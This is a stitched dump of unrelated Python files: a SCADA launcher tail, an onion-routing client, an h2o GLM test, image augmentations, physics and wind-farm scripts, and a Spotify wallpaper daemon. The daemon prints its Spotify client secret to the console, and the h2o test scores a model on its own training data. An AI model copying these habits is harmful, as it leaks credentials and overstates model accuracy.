:param parser_instance: instance of argparser :param arg: the path to check """ if not os.path.exists(arg): parser_instance.error(arg + " does not exist.") else: return arg if __name__ == "__main__": parser = argparse.ArgumentParser(description='Start everything for a scada') parser.add_argument(dest="intermediate_yaml", help="intermediate yaml file", metavar="FILE", type=lambda x: is_valid_file(parser, x)) args = parser.parse_args() plc = GenericScada(intermediate_yaml_path=Path(args.intermediate_yaml))dennislblog/codingsrc/1232-check_straight_line.py class Solution(object): def checkStraightLine(self, coordinates): """ :type coordinates: List[List[int]] :rtype: bool @ 问题: 判断是否是一条直线 """ # 直接看 d(y-y0) * d(x1-x0) == d(x-x0) * d(y1-y0) dy = coordinates[1][1] - coordinates[0][1] dx = coordinates[1][0] - coordinates[0][0] for i in range(2, len(coordinates)): dyp = coordinates[i][1] - coordinates[0][1] dxp = coordinates[i][0] - coordinates[0][0] if dy * dxp != dx * dyp: return False return True0:13.36import unittest, random, sys, time sys.path.extend(['.','..','../..','py']) import h2o, h2o_cmd, h2o_import as h2i, h2o_exec, h2o_glm, h2o_gbm, h2o_exec as h2e class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): h2o.init(java_heap_GB=10) @classmethod def tearDownClass(cls): h2o.tear_down_cloud() def test_GLM2_tmp(self): importFolderPath = "/tmp" csvFilename = 's.csv' bcFilename = 'bc.csv' csvPathname = importFolderPath + "/" + csvFilename bcPathname = importFolderPath + "/" + bcFilename hex_key = csvFilename + ".hex" bc_key = bcFilename + ".hex" # Parse parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key, timeoutSecs=180) inspect = h2o_cmd.runInspect(key=hex_key) print "\n" + csvPathname, \ " numRows:", "{:,}".format(inspect['numRows']), \ " numCols:", "{:,}".format(inspect['numCols']) bcResult = h2i.import_parse(path=bcPathname, schema='put', hex_key=bc_key, timeoutSecs=180) inspect = h2o_cmd.runInspect(key=bc_key) print "\n" + bcPathname, \ " numRows:", "{:,}".format(inspect['numRows']), \ " numCols:", "{:,}".format(inspect['numCols']) # Split Test/Train************************************************ # how many rows for each pct? 
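# Note that no split is actually performed below: both trainDataKey and
# testDataKey point at the same parsed frame (hex_key), so the GLM is scored on
# its own training data. A real train/test split would substitute distinct keys
# (e.g. produced by an exec/slice step) before the GLM / predict /
# confusion-matrix loop that follows.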
numRows = inspect['numRows'] trainDataKey = hex_key testDataKey = hex_key # GLM, predict, CM*******************************************************8 kwargs = { 'response': "response", 'non_negative': 0, 'standardize': 1, 'strong_rules': 1, 'alpha': 0, 'max_iter': 100, 'lambda_min_ratio': -1, 'higher_accuracy': 1, 'beta_constraints': bc_key, 'link': "family_default", 'use_all_factor_levels': 0, 'variable_importances': 0, 'lambda': 0, 'prior': 0.00301875221383974, 'nlambdas': -1, 'source': hex_key, 'lambda_search': 0, 'disable_line_search': 0, 'n_folds': 0, 'family': "binomial", 'beta_epsilon': 1e-04, 'intercept': 1, 'max_predictors': -1, # "used_cols"': "4,5,18,37,38,53,66,73,90,93,95,96,112,117,135,158,165,166,168,177,180", # 'ignored_cols': "1,2,3,4,5,6,7,8,9,11,12,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,31,32,34,35,36,37,38,40,41,42,43,44,45,46,47,48,49,51,52,53,54,55,56,57,58,59,60,61,62,63,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,91,92,93,94,95,96,97,98,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,119,120,121,123,124,125,126,128,129,133,134,135,136,137,138,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,173,174,176,177,178,179", } timeoutSecs = 180 for trial in range(10): parseKey = trainDataKey # GLM **********************************************8 start = time.time() glm = h2o_cmd.runGLM(parseResult=parseResult, timeoutSecs=timeoutSecs, pollTimeoutSecs=180, **kwargs) print "glm end on ", parseResult['destination_key'], 'took', time.time() - start, 'seconds' h2o_glm.simpleCheckGLM(self, glm, None, **kwargs) modelKey = glm['glm_model']['_key'] # Score ********************************************** predictKey = 'Predict.hex' start = time.time() predictResult = h2o_cmd.runPredict( data_key=testDataKey, model_key=modelKey, destination_key=predictKey, timeoutSecs=timeoutSecs) predictCMResult = h2o.nodes[0].predict_confusion_matrix( actual=testDataKey, vactual='response', predict=predictKey, vpredict='predict', ) cm = predictCMResult['cm'] # These will move into the h2o_gbm.py pctWrong = h2o_gbm.pp_cm_summary(cm); self.assertLess(pctWrong, 8,"Should see less than 7% error") print "\nTest\n==========\n" print h2o_gbm.pp_cm(cm) print "Trial #", trial, "completed" if __name__ == '__main__': h2o.unit_main() wtglover/TOR0 from Crypt import Crypt, Symmetric import logging import socket from os import urandom from Crypto.PublicKey import RSA import struct import sys from threading import Lock tri_logger = logging.getLogger("TorRouterInterface") tri_logger.setLevel(logging.INFO) ch = logging.StreamHandler() ch.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') ch.setFormatter(formatter) tri_logger.addHandler(ch) class Onion(object): def __init__(self, sid, crypt, next_onion=None): self.sid = sid self.crypt = crypt self.client_symkey = Symmetric.generate() self.client_sym = Symmetric(self.client_symkey, sid) self.next_onion = next_onion def wrap(self, pkt, status): payload = self.crypt.sign_and_encrypt("CLNT" + self.sid + self.client_symkey) if not self.next_onion: payload += self.client_sym.encrypt_payload(pkt, status) else: next_request = self.next_onion.wrap(pkt, status) payload += self.client_sym.encrypt_payload(next_request, status) return payload def unwrap(self, onion): crypt_header, header, body = self.client_sym.unpack_payload(onion) self.client_sym.absorb_crypto_header(crypt_header) l, status = 
self.client_sym.decrypt_header(header) if status != "OKOK": raise CircuitFailed tri_logger.debug("PO - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = self.client_sym.decrypt_body(body) if not self.next_onion: return body return self.next_onion.unwrap(body) class CircuitFailed(Exception): pass class TorRouterInterface(object): CT_BLOCK_SIZE = 256 HEADER_SIZE = 2 * CT_BLOCK_SIZE def __init__(self, (pkt, ip, port, router_pubkey, sid, symkey), next_router=None, is_entry=False): """TorRouterInterface Interface to Tor Router circuit Args: (pkt (str), ip (str), port (int), router_pubkey (RSA key), symkey (str)): Router information returned by TorPathingServer interface next_router (TorRouterInterface - optional): Next Tor router to wrap/peel onion. Must include unless router is exit node is_entry (bool - optional): Set to True if router is entry node """ self.pkt = pkt self.ipp = (ip, port) self.router_pubkey = router_pubkey self.sid = sid self.client_symkey = symkey self.resp_symkey = symkey self.next_symkey = None self.prev_symkey = None self.next_router = next_router self.is_entry = is_entry self.is_exit = False if next_router else True self.client_key = Crypt().generate_key() self.crypt = Crypt(public_key=router_pubkey, private_key=self.client_key, name="interface%d" % port) self.client_sym = Symmetric(self.client_symkey, sid) self.db_mutex = Lock() self.established = False def lock_interface(func): """function wrapper for functions that require db access""" def func_wrap(self, *args): """acquire and release dbMuted if available""" # if self.db_mutex: self.db_mutex.acquire() result = None e = None try: result = func(self, *args) except: e = sys.exc_info() pass finally: self.db_mutex.release() if e: raise e[0], e[1], e[2] return result return func_wrap def _keep_alive(self): pass # TODO: add keep alive def _connect(self): s = socket.socket() s.connect(self.ipp) return s def _pull(self, s, length): message = '' while len(message) < length: message += s.recv(length - len(message)) return message def _recv(self, s): resp_sym = Symmetric(self.resp_symkey) headers = self._pull(s, resp_sym.CRYPT_HEADER_LEN + resp_sym.HEADER_LEN) crypt_header, header, _ = resp_sym.unpack_payload(headers) resp_sym.absorb_crypto_header(crypt_header) l, status = resp_sym.decrypt_header(header) return resp_sym.decrypt_body(self._pull(s, l)) def peel_onion(self, onion): crypt_header, header, body = self.client_sym.unpack_payload(onion) self.client_sym.absorb_crypto_header(crypt_header) l, status = self.client_sym.decrypt_header(header) if status != "OKOK": raise CircuitFailed tri_logger.debug("PO - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = self.client_sym.decrypt_body(body) if self.is_exit: return body return self.next_router.peel_onion(body) @lock_interface def establish_circuit(self, prev_symkey=None): """establish_circuit Establishes a Tor circuit Args: prev_symkey (str - optional): symkey of last Tor router - do not set externally Raises: CircuitFailed: If connection to circuit failed """ self.prev_symkey = prev_symkey or self.client_symkey payload = self.pkt if self.is_exit: header = self.client_key.publickey().exportKey("DER") header += struct.pack(">16s16s4sl", prev_symkey, "\x00" * 16, "\x00" * 4, -1) payload += self.client_sym.encrypt_payload(header, "EXIT") else: self.next_symkey = self.client_sym.generate() header = self.client_key.publickey().exportKey("DER") next_payload = self.next_router.establish_circuit(self.next_symkey) header += 
struct.pack(">16s16s4sL%ds" % len(next_payload), self.prev_symkey, self.next_symkey, socket.inet_aton(self.next_router.ipp[0]), self.next_router.ipp[1], next_payload) payload += self.client_sym.encrypt_payload(header, "ESTB") if not self.is_entry: return payload tri_logger.debug("Connecting to %s:%d for circuit establishment" % self.ipp) s = self._connect() s.sendall(payload) response = self._recv(s) s.close() self.peel_onion(response) self.established = True # @lock_interface def build_onion(self): if self.is_exit: return Onion(self.sid, self.crypt) return Onion(self.sid, self.crypt, self.next_router.build_onion()) # @lock_interface def make_request(self, url, request): """make_request Sends a request to a target url through the Tor network and returns the response Args: url (str): Top level URL of target server formatted as "IP:PORT" request (str): Body of request to target server Returns: (str): Plaintext response from server Raises: CircuitFailed: If connection to circuit failed """ if not self.established: raise CircuitFailed url_port = url.split(":") ip = socket.gethostbyname(url_port[0]) port = int(url_port[1]) if len(url_port) == 2 else 80 onion = self.build_onion() exit_pkt = struct.pack(">4sl%ds" % len(request), socket.inet_aton(ip), port, request) payload = onion.wrap(exit_pkt, "SEND") tri_logger.info("Requesting %s:%d" % (ip, port)) s = self._connect() s.send(payload) response = self._recv(s) s.close() return onion.unwrap(response) @lock_interface def close_circuit(self): """close_circuit Closes the established Tor circuit - must do before exiting Raises: CircuitFailed: If connection to circuit failed """ # generate new client symkey # self.client_symkey = urandom(16) # self.client_sym = Symmetric(self.client_symkey, self.sid) onion = self.build_onion() payload = onion.wrap("", "EXIT") tri_logger.info("Closing circuit") s = self._connect() s.sendall(payload) response = self._recv(s) s.close() self.established = False return onion.unwrap(response) class TestTorRouterInterface(object): CT_BLOCK_SIZE = 256 HEADER_SIZE = 2 * CT_BLOCK_SIZE def __init__(self, (pkt, ip, port, tor_pubkey, sid, symkey), next_router=None, is_entry=False, is_exit=False, router_key=None, server_pubkey=None): self.pkt = pkt self.ipp = (ip, port) self.tor_pubkey = tor_pubkey self.sid = sid self.client_symkey = symkey self.next_symkey = None self.prev_symkey = None self.next_router = next_router self.is_entry = is_entry self.is_exit = is_exit self.router_key = router_key self.client_key = Crypt().generate_key() self.server_pubkey = server_pubkey self.local_crypt = Crypt(public_key=router_key.publickey(), private_key=self.client_key, name="local%d" % port, debug=True) self.router_crypt = Crypt(public_key=self.client_key.publickey(), private_key=self.router_key, name="router%d" % port, debug=True) self.server_crypt = Crypt(public_key=server_pubkey, private_key=self.router_key, name="server%d" % port, debug=True) def _keep_alive(self): pass def _handle_establishment(self, payload): pkt, (crypt_header, header, body) = payload[:512], Symmetric().unpack_payload(payload[512:]) data, hsh = self.server_crypt.decrypt(pkt) self.server_crypt.auth(data, hsh) method, rid, self.recv_sid, symkey = data[:4], data[4:20], data[20:28], data[28:44] client_sym = Symmetric(symkey, self.recv_sid) client_sym.absorb_crypto_header(crypt_header) l, status = client_sym.decrypt_header(header) tri_logger.debug("HE - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = client_sym.decrypt_body(body) der_len = 
Crypt().PUB_DER_LEN raw_clientkey, self.recv_prev_symkey, self.recv_next_symkey, next_payload = \ body[:der_len], \ body[der_len:der_len + 16], \ body[der_len + 16:der_len + 32], \ body[der_len + 32:] self.recv_client_key = RSA.importKey(raw_clientkey) if self.is_exit: response = '' else: response = self.next_router._handle_establishment(next_payload) next_sym = Symmetric(self.recv_next_symkey) crypt_header, header, body = client_sym.unpack_payload(response) next_sym.absorb_crypto_header(crypt_header) l, status = next_sym.decrypt_header(header) tri_logger.debug("H2 - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) response = next_sym.decrypt_body(body) response = client_sym.encrypt_payload(response, "OKOK") return Symmetric(self.recv_prev_symkey).encrypt_payload(response, "OKOK") def establish_circuit(self, prev_symkey=None): sym = Symmetric(self.client_symkey, self.sid) self.prev_symkey = prev_symkey or self.client_symkey if self.is_exit: payload = self.pkt payload += sym.encrypt_payload(self.client_key.publickey().exportKey("DER") + prev_symkey, "EXIT") else: payload = self.pkt self.next_symkey = sym.generate() next_payload = self.next_router.establish_circuit(self.next_symkey) payload += sym.encrypt_payload(self.client_key.publickey().exportKey("DER") + self.prev_symkey + self.next_symkey + next_payload, "ESTB") if not self.is_entry: return payload response = self._handle_establishment(payload) self.resp_symkey = self.client_symkey resp_sym = Symmetric(self.resp_symkey) crypt_header, header, body = resp_sym.unpack_payload(response) resp_sym.absorb_crypto_header(crypt_header) l, status = resp_sym.decrypt_header(header) tri_logger.debug("EC - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = resp_sym.decrypt_body(body) return self.peel_onion(body) def peel_onion(self, onion): sym = Symmetric(self.client_symkey, self.sid) crypt_header, header, body = sym.unpack_payload(onion) sym.absorb_crypto_header(crypt_header) l, status = sym.decrypt_header(header) tri_logger.debug("PO - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = sym.decrypt_body(body) if self.is_exit: return body return self.next_router.peel_onion(body) def _handle_request(self, payload): pkt, (crypt_header, header, body) = payload[:512], Symmetric().unpack_payload(payload[512:]) data, hash = self.router_crypt.decrypt(pkt) self.router_crypt.auth(data, hash) method, sid, symkey = data[:4], data[4:12], data[12:] assert sid == self.recv_sid client_sym = Symmetric(symkey, sid) client_sym.absorb_crypto_header(crypt_header) l, status = client_sym.decrypt_header(header) tri_logger.debug("HR - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = client_sym.decrypt_body(body) if self.is_exit: ip_raw, port, request = struct.unpack("!4sI%ds" % (len(body) - 8), body) ip = socket.inet_ntoa(ip_raw) s = socket.socket() s.connect((ip, port)) s.sendall(request) s.settimeout(1) chunk = "asdf" payload = "" need_data = True while len(chunk) > 0 or need_data: try: chunk = s.recv(1024) except socket.timeout: chunk = '' except socket.error: payload += chunk break tri_logger.debug("Received chunk from website (%dB)" % len(chunk)) payload += chunk if len(chunk) > 0: need_data = False return_sym = Symmetric(self.recv_prev_symkey) payload = client_sym.encrypt_payload(payload, "OKOK") return return_sym.encrypt_payload(payload, "OKOK") response = self.next_router._handle_request(body) next_sym = Symmetric(self.recv_next_symkey) crypt_header, header, body = 
client_sym.unpack_payload(response) # print response next_sym.absorb_crypto_header(crypt_header) l, status = next_sym.decrypt_header(header) tri_logger.debug("HR - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) response = next_sym.decrypt_body(body) response = client_sym.encrypt_payload(response, "OKOK") ret = Symmetric(self.recv_prev_symkey).encrypt_payload(response, "OKOK") return ret def make_request(self, url, request): url_port = url.split(":") ip = socket.gethostbyname(url_port[0]) port = int(url_port[1]) if len(url_port) == 2 else 80 tri_logger.info("Requesting %s:%d" % (ip, port)) # generate new client symkey self.client_symkey = urandom(16) client_sym = Symmetric(self.client_symkey, self.sid) if self.is_exit: payload = self.local_crypt.sign_and_encrypt("CLNT" + self.sid + self.client_symkey) port_bs = struct.pack("!I", port) payload += client_sym.encrypt_payload(socket.inet_aton(ip) + port_bs + request, "SEND") else: payload = self.local_crypt.sign_and_encrypt("CLNT" + self.sid + self.client_symkey) # print payload.encode("hex")[16:32] next_request = self.next_router.make_request(url, request) # print self.ipp[1], len(payload) # print ("CLNT" + self.sid + self.client_symkey).encode('hex') payload += client_sym.encrypt_payload(next_request, "SEND") if not self.is_entry: return payload tri_logger.info("Sending packet") response = self._handle_request(payload) resp_sym = Symmetric(self.resp_symkey) crypt_header, header, body = resp_sym.unpack_payload(response) # print "5", self.ipp[1], self.client_symkey.encode('hex') resp_sym.absorb_crypto_header(crypt_header) l, status = resp_sym.decrypt_header(header) tri_logger.debug("MR - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = resp_sym.decrypt_body(body) return self.peel_onion(body) def _handle_close(self, payload): pkt, (crypt_header, header, body) = payload[:512], Symmetric().unpack_payload(payload[512:]) data, hash = self.router_crypt.decrypt(pkt) self.router_crypt.auth(data, hash) method, sid, symkey = data[:4], data[4:12], data[12:] assert sid == self.recv_sid client_sym = Symmetric(symkey, sid) client_sym.absorb_crypto_header(crypt_header) l, status = client_sym.decrypt_header(header) tri_logger.debug("HC - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = client_sym.decrypt_body(body) if self.is_exit: return_sym = Symmetric(self.recv_prev_symkey) payload = client_sym.encrypt_payload("", "EXIT") return return_sym.encrypt_payload(payload, "EXIT") response = self.next_router._handle_close(body) next_sym = Symmetric(self.recv_next_symkey) crypt_header, header, body = client_sym.unpack_payload(response) next_sym.absorb_crypto_header(crypt_header) l, status = next_sym.decrypt_header(header) tri_logger.debug("HR - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) response = next_sym.decrypt_body(body) response = client_sym.encrypt_payload(response, "EXIT") return Symmetric(self.recv_prev_symkey).encrypt_payload(response, "EXIT") def close_circuit(self): # generate new client symkey self.client_symkey = urandom(16) client_sym = Symmetric(self.client_symkey, self.sid) if self.is_exit: payload = self.local_crypt.sign_and_encrypt("CLNT" + self.sid + self.client_symkey) payload += client_sym.encrypt_payload("", "EXIT") else: payload = self.local_crypt.sign_and_encrypt("CLNT" + self.sid + self.client_symkey) next_request = self.next_router.close_circuit() payload += client_sym.encrypt_payload(next_request, "EXIT") if not self.is_entry: return payload 
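# Only the entry node continues past this point: intermediate and exit nodes
# hand their layered "EXIT" payload back up the recursion, while the entry node
# feeds the complete onion through _handle_close() (the in-process stand-in for
# a real router) and then peels the layered response with peel_onion() below.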
tri_logger.info("Sending packet") response = self._handle_close(payload) resp_sym = Symmetric(self.resp_symkey) crypt_header, header, body = resp_sym.unpack_payload(response) # print "5", self.ipp[1], self.client_symkey.encode('hex') resp_sym.absorb_crypto_header(crypt_header) l, status = resp_sym.decrypt_header(header) tri_logger.debug("CC - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = resp_sym.decrypt_body(body) return self.peel_onion(body) 0 # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/09_Data_Augmentation.ipynb (unless otherwise specified). __all__ = ['jpgcompression', 'gaussian_kernel', 'gaussian_blur', 'photonoise'] # Cell from torchvision import transforms from fastai.vision import * def _jpgcompression(x): quality = random.randrange(10, 100) x = transforms.ToPILImage()(x).convert("RGB") outputIoStream = BytesIO() x.save(outputIoStream, "JPEG", quality=quality, optimice=True) outputIoStream.seek(0) img = PIL.Image.open(outputIoStream) tensor = transforms.ToTensor()(img) return tensor # Cell jpgcompression = TfmPixel(_jpgcompression, order=10) # Cell def gaussian_kernel(size, sigma=2., dim=2, channels=3): # The gaussian kernel is the product of the gaussian function of each dimension. # kernel_size should be an odd number. kernel_size = 2*size + 1 kernel_size = [kernel_size] * dim sigma = [sigma] * dim kernel = 1 meshgrids = torch.meshgrid([torch.arange(size, dtype=torch.float32) for size in kernel_size]) for size, std, mgrid in zip(kernel_size, sigma, meshgrids): mean = (size - 1) / 2 kernel *= 1 / (std * math.sqrt(2 * math.pi)) * torch.exp(-((mgrid - mean) / (2 * std)) ** 2) # Make sure sum of values in gaussian kernel equals 1. kernel = kernel / torch.sum(kernel) # Reshape to depthwise convolutional weight kernel = kernel.view(1, 1, *kernel.size()) kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1)) return kernel # Cell def _gaussian_blur(x, kernel_size_max=5): size = random.randrange(0, kernel_size_max) kernel = gaussian_kernel(size=size) kernel_size = 2*size + 1 x = x[None,...] padding = int((kernel_size - 1) / 2) x = F.pad(x, (padding, padding, padding, padding), mode='reflect') x = torch.squeeze(F.conv2d(x, kernel, groups=3)) return x # Cell gaussian_blur = TfmPixel(_gaussian_blur) # Cell def _photonoise(x, std_max=0.001): vals = len(np.unique(x)) vals = 2 ** np.ceil(np.log2(vals)) # Generating noise for each unique value in image. 
x = np.random.poisson(x * vals) / float(vals) std = random.uniform(0, std_max) noise = np.random.normal(0,std,size=x.shape) x = np.maximum(0,x+noise) x = torch.Tensor(x) x.clamp_(0,1) return x # Cell photonoise = TfmPixel(_photonoise)import FWCore.ParameterSet.Config as cms import sys from SimMuon.CSCDigitizer.cscChamberMasker_cfi import cscChamberMasker as _cscChamberMasker def appendCSCChamberMaskerAtUnpacking(process): if hasattr(process,'muonCSCDigis') : sys.stderr.write("[appendCSCChamberMasker] : Found muonCSCDigis, applying filter\n") process.preCSCDigis = process.muonCSCDigis.clone() process.muonCSCDigis = _cscChamberMasker.clone() process.muonCSCDigis.stripDigiTag = cms.InputTag("preCSCDigis", "MuonCSCStripDigi") process.muonCSCDigis.wireDigiTag = cms.InputTag("preCSCDigis", "MuonCSCWireDigi") process.muonCSCDigis.comparatorDigiTag = cms.InputTag("preCSCDigis", "MuonCSCComparatorDigi") process.muonCSCDigis.rpcDigiTag = cms.InputTag("preCSCDigis", "MuonCSCRPCDigi") process.muonCSCDigis.alctDigiTag = cms.InputTag("preCSCDigis", "MuonCSCALCTDigi") process.muonCSCDigis.clctDigiTag = cms.InputTag("preCSCDigis", "MuonCSCCLCTDigi") process.filteredCscDigiSequence = cms.Sequence(process.preCSCDigis + process.muonCSCDigis) process.RawToDigi.replace(process.muonCSCDigis, process.filteredCscDigiSequence) if hasattr(process,"RandomNumberGeneratorService") : process.RandomNumberGeneratorService.muonCSCDigis = cms.PSet( initialSeed = cms.untracked.uint32(789342) ) else : process.RandomNumberGeneratorService = cms.Service( "RandomNumberGeneratorService", muonCSCDigis = cms.PSet(initialSeed = cms.untracked.uint32(789342)) ) return process def appendCSCChamberMaskerAtHLT(process): if hasattr(process,'hltMuonCSCDigis') : sys.stderr.write("[appendCSCChamberMasker] : Found hltMuonCSCDigis, applying filter\n") process.preHltCSCDigis = process.hltMuonCSCDigis.clone() process.hltMuonCSCDigis = _cscChamberMasker.clone() process.hltMuonCSCDigis.stripDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCStripDigi") process.hltMuonCSCDigis.wireDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCWireDigi") process.hltMuonCSCDigis.comparatorDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCComparatorDigi") process.hltMuonCSCDigis.rpcDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCRPCDigi") process.hltMuonCSCDigis.alctDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCALCTDigi") process.hltMuonCSCDigis.clctDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCCLCTDigi") process.filteredHltCSCDigiSequence = cms.Sequence(process.preHltCSCDigis + process.hltMuonCSCDigis) process.HLTMuonLocalRecoSequence.replace(process.hltMuonCSCDigis, process.filteredHltCSCDigiSequence) if hasattr(process,"RandomNumberGeneratorService") : process.RandomNumberGeneratorService.hltMuonCSCDigis = cms.PSet( initialSeed = cms.untracked.uint32(789342) ) else : process.RandomNumberGeneratorService = cms.Service( "RandomNumberGeneratorService", hltMuonCSCDigis = cms.PSet(initialSeed = cms.untracked.uint32(789342)) ) return process from utils import data_generator from tcn import compiled_tcn def run_task(): (x_train, y_train), (x_test, y_test) = data_generator() model = compiled_tcn(return_sequences=False, num_feat=1, num_classes=10, nb_filters=20, kernel_size=6, dilations=[2 ** i for i in range(9)], nb_stacks=1, max_len=x_train[0:1].shape[1], use_skip_connections=True) print('x_train.shape = {}'.format(x_train.shape)) print('y_train.shape = {}'.format(y_train.shape)) print('x_test.shape = {}'.format(x_test.shape)) print('y_test.shape = 
{}'.format(y_test.shape)) model.summary() model.fit(x_train, y_train.squeeze().argmax(axis=1), epochs=100, validation_data=(x_test, y_test.squeeze().argmax(axis=1))) if __name__ == '__main__': run_task() import numpy as np import pandas as pd import matplotlib.pyplot as plt import floris.tools as wfct print("========== visualizing flow field with one turbine =========") fi = wfct.floris_interface.FlorisInterface("examples/example_input.json") fi.reinitialize_flow_field(layout_array=([0], [0]), turbulence_intensity=[0.15]) fi.calculate_wake() # calculate turbine power output with and without turbulence correction _power = fi.get_turbine_power() turbulent_power = fi.get_turbine_power(use_turbulence_correction=True) hor_plane = fi.get_hor_plane() txt = ( str("Turbine Power Output: \n With Turbulence Correction: ") + str(turbulent_power[0] * 10 ** -6) + (" MW\n Without Turbulence Correction: ") + str(_power[0] * 10 ** -6) + str(" MW") ) fig = plt.figure(figsize=(10, 7)) ax = plt.subplot() im = wfct.visualization.visualize_cut_plane(hor_plane, ax) cbar = fig.colorbar(im, ax=ax, fraction=0.025, pad=0.04) cbar.set_label("Wind Speed (m/s)", labelpad=+10) ax.set_xlabel("Easting (m)") ax.set_ylabel("Northing (m)") plt.text(0, -0.5, txt, transform=ax.transAxes) plt.savefig("examples/other/turbine.png", format='png') plt.show() print( "========== calculating power curve at each wind speed and turbulence intensity ==========" ) sp = [ 0.1, 3.5, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0, 20.0, 21.0, 22.0, 23.0, 24.0, 30.0, ] power = np.zeros((10, 24)) ti = np.linspace(0.0, 0.5, num=10) for i in range(10): TI = [ti[i]] powers = [] for j in range(24): speed = [sp[j]] fi.reinitialize_flow_field(wind_speed=speed, turbulence_intensity=TI) fi.calculate_wake() p = fi.get_turbine_power(use_turbulence_correction=True) powers.append(p[0]) power[i] = powers print("========== plotting adjusted power curve ==========") color = [ "navy", "#014d4e", "teal", "g", "yellowgreen", "y", "orange", "red", "crimson", "maroon", ] fig = plt.subplots(figsize=(10, 7)) for i in range(10): plt.plot(sp, list(power[i, :]), c=color[i], label=str(int(ti[i] * 100)) + "%") plt.legend() plt.xlabel("Wind Speed (m/s)") plt.ylabel("Power (W)") plt.savefig("examples/other/curve.png", format='png') plt.show() background-mediad/src/background-mediad/background-mediad.py #!/usr/bin/env python3 # Background media daemon import gi gi.require_version('Playerctl', '2.0') from gi.repository import GLib, Playerctl import subprocess import re from urllib import request, parse import os.path import json import spotipy from Xlib.display import Display from spotipy.oauth2 import SpotifyClientCredentials from xdg import xdg_cache_home, xdg_config_home from pathlib import Path import tempfile player = Playerctl.Player() playing = False previousAlbumArt = None #Used to not reblur if you're listening to an album cachedir = xdg_cache_home().joinpath("background-media") configdir = xdg_config_home().joinpath("background-media") tempdir = Path(os.path.join(tempfile.gettempdir(),"background-media")) #setup dirs cachedir.mkdir(parents=True, exist_ok=True) configdir.mkdir(parents=True, exist_ok=True) tempdir.mkdir(parents=True, exist_ok=True) def getResolution(): screen = Display(':0').screen() return "{}x{}".format(screen.width_in_pixels,screen.height_in_pixels) def squareResolution(): screen = Display(':0').screen() x = screen.width_in_pixels y = screen.height_in_pixels if x >= y: return "{}x{}".format(x,x) else: 
return "{}x{}".format(y,y) resolution = getResolution() print(resolution) print(squareResolution()) def on_metadata(player, metadata): #print(playing) #print(metadata) if not playing: return global previousAlbumArt global resolution artUrl = None trackId = None if 'mpris:artUrl' and 'mpris:trackid' in metadata.keys(): artUrl = metadata["mpris:artUrl"] trackId = metadata["mpris:trackid"] try: artUrl =sp.track(trackId)["album"]["images"][0]["url"] except: print("couldn't find artUrl from api, using mpris") #print(sp.track(trackId)["images"]) else: return #print(imageLocation) if isinstance(trackId, str) and isinstance(artUrl, str) and trackId.startswith('spotify'): artUrl = re.sub("https?:\\/\\/open.spotify.com\\/image\\/", "https://i.scdn.co/image/", artUrl) fileName = parse.urlparse(artUrl).path.split('/')[-1] imageLocation = cachedir.joinpath(fileName) resultImage = cachedir.joinpath("result.png") print(resultImage) if not os.path.isfile(imageLocation): print("Downloading:" + artUrl) request.urlretrieve(artUrl, imageLocation) # print(artUrl) # convert ab67616d0000b27322fcfdc99b8aa0dbe167989d \( -clone 0 -blur 0x9 -resize 1920x1200\! \) \( -clone 0 \) -delete 0 -gravity center -compose over -composite result.png # to blur image if imageLocation != previousAlbumArt: print("blurring image") subprocess.run(["convert", imageLocation, "(", "-clone", "0","-resample", "50%", "-blur", "0x9", "-resize", squareResolution() + "!" , ")", "(", "-clone", "0", ")", "-delete", "0", "-gravity", "center", "-compose", "over", "-composite", resultImage]) # subprocess.run(["feh","--bg-fill",resultImage]) previousAlbumArt = imageLocation #if 'mpris:artUrl' in metadata.keys(): # print(metadata['mpris:artUrl']) def on_play(player,status): global playing playing = True print(os.path.join(tempdir,"playing")) open(tempdir.joinpath("playing"),'w') def on_pause(player,status): global playing playing = False # subprocess.run(["feh","--bg-tile",cachedir.joinpath("../background-fm/out.png")]) os.remove(tempdir.joinpath("playing")) player.connect('metadata', on_metadata) player.connect('playback-status::playing', on_play) player.connect('playback-status::paused', on_pause) # spotify auth spotifyConfig = json.loads(open(configdir.joinpath("spotify_config.json"), 'r').read()) print(spotifyConfig) sp = spotipy.Spotify(auth_manager=SpotifyClientCredentials(client_id=spotifyConfig["id"],client_secret=spotifyConfig["secret"])) main = GLib.MainLoop() main.run() """ End-to-end tests for running directly in the operating system. 
